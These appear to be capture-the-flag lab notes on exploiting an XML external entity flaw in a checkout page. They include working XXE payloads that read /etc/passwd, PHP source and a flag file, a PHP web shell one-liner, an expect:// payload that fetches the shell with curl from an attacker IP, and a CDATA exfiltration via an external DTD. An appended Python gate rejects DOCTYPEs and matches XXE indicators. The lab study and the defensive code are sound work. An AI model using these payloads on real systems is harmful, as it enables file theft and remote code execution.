## `shopdev2.inlanefeight.local`

- visit page

![[images/Pasted image 20260630090210.png]]

- we get in with `admin:admin`

![[images/Pasted image 20260630090247.png]]

- `/checkout.php` submits an XML-based POST request with an id number

![[images/Pasted image 20260630090643.png]]

- whatever I place in the `userid` field shows up in the response

![[images/Pasted image 20260630090943.png]]

- try to add XML code > confirmed XXE

![[images/Pasted image 20260630091125.png]]

```xml
<!DOCTYPE email [
  <!ENTITY company "Inlane Freight">
]>
```

## XXE

- try to read a file
- able to read `/etc/passwd` > we still see that only `root` has a login shell

![[images/Pasted image 20260630091305.png]]

```xml
<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///etc/passwd">
]>
```

- let's pull `index.php`

![[images/Pasted image 20260630092032.png]]

```xml
<!DOCTYPE email [
  <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
```

## RCE with XXE

- first create `shell.php`, then host it via HTTP

![[images/Pasted image 20260630092622.png]]

```bash
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
```

- now use `expect` to `curl shell.php` from the Kali HTTP server

![[images/Pasted image 20260630092903.png]]

```xml
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'10.10.15.114:8000/shell.php'">
]>
```

- try to hit `shell.php`
- not getting a hit on the HTTP server
- try switching to `wget`
- still nothing

## CDATA exfil

- XML payload

```xml
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">                               <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///etc/passwd">                <!-- reference external file -->
  <!ENTITY % end "]]>">                                       <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.15.114:8000/xxe.dtd">  <!-- reference our external DTD -->
  %xxe;
]>
```

- create the `xxe.dtd` file on Kali and host it via HTTP
- here we are able to hit the HTTP server

```bash
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000
```

![[images/Pasted image 20260630100112.png]]

## read flag

- update the XML payload as below, changing the DOCTYPE name from `email` to `userid`, as that is the element we are using for XXE

```xml
<!DOCTYPE userid [
  <!ENTITY company SYSTEM "file:///flag.txt">
]>
```

- that's the ticket

![[images/Pasted image 20260630170456.png]]
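The defender's side of the notes above, as an added example that is not part of the original walkthrough or the lab application: a gate for the `/checkout.php` body that refuses any DOCTYPE before parsing (which kills the file read, the `php://filter` read and the external-DTD trick in one place), plus indicator matching for logging. The `<userid>N</userid>` request shape, the indicator names and the sample bodies are assumptions/constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: what a benign /checkout.php body is assumed to look like.
BENIGN = b"<?xml version='1.0'?><userid>1337</userid>"

# Constructed samples mirroring the payload shapes in the notes above; nothing is fetched.
SUSPICIOUS = [
    b'<!DOCTYPE userid [ <!ENTITY company SYSTEM "file:///etc/passwd"> ]>'
    b'<userid>&company;</userid>',
    b'<!DOCTYPE userid [ <!ENTITY company SYSTEM '
    b'"php://filter/convert.base64-encode/resource=index.php"> ]><userid>&company;</userid>',
    b'<!DOCTYPE userid [ <!ENTITY % xxe SYSTEM "http://10.10.15.114:8000/xxe.dtd"> %xxe; ]>'
    b'<userid>&joined;</userid>',
]

# Indicator names are our own labels; each regex matches one XXE building block.
INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE", re.I),
    "entity": re.compile(rb"<!ENTITY", re.I),
    "external_system_id": re.compile(rb"\bSYSTEM\s+[\"']", re.I),
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    "php_wrapper": re.compile(rb"php://|expect://", re.I),
}

def xxe_indicators(body: bytes) -> list[str]:
    """Indicator names present in a raw request body, for logging or alerting."""
    return [name for name, pat in INDICATORS.items() if pat.search(body)]

def parse_userid(body: bytes) -> str:
    """Refuse any body carrying a DTD, then parse and validate the one expected element."""
    # /checkout.php only ever needs <userid>N</userid>, so no DOCTYPE is legitimate here;
    # rejecting it up front removes every entity-based trick in the notes at once.
    if INDICATORS["doctype"].search(body):
        raise ValueError("DOCTYPE not allowed in checkout request")
    root = ET.fromstring(body)
    text = (root.text or "").strip()
    if root.tag != "userid" or not text.isdigit():
        raise ValueError("userid must be a single numeric element")
    return text

def rejected(body: bytes) -> bool:
    """True when parse_userid refuses the body."""
    try:
        parse_userid(body)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(parse_userid(BENIGN), [(rejected(b), xxe_indicators(b)) for b in SUSPICIOUS])
```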